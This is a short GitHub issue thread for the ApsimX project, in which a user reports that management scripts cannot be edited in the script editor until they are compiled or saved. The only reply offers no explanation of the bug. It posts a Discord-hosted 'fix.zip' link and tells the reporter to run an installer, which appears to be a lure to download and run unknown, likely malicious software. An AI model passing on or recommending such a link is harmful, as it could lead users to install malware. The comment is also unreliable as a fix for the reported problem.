### ISSUE TITLE
Management script not edittable until saved

### ISSUE THREAD

**Issue by ric394** [APSIMInitiative/ApsimX#9278]
### What happened?

I ran into this issue modifying the management toolbox scripts.  This is also an issue if add a management script using the add model functionality as well.
I was unable to change anything in the script editor until it was compiled/saved.

### What Operating System are you on?

Windows

**Comment by Klevente12** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer
